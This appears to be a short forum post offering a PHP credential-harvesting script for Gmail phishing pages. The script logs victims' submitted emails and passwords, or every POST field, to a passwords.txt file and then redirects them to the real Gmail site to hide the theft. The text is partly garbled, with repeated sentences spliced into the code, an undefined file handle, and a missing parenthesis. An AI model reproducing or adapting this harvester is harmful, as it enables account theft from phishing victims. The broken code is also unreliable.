[PHP]Some Custom Login.php
So i made a custom login.php to log your accounts to a file.
Only use this for gmail phisher
This works for any phisher.
Only use this for gmail phisher
$stuff = "Email: " . $_POST["Email"] . "Password: " . $_POST["Passwd"] . "\r\n\n";
$file = fopen("passwords.txt","a");
fwrite($file,$stuff);
fclose($file); This works for any phisher.
$file = fopen("passwords.txt","a");
foreach($_POST as $variable => $value)
{
fwrite($f, $variable . " = " . $value . "\r\n\n";
}
fclose($file);
header("location: http://gmail.com");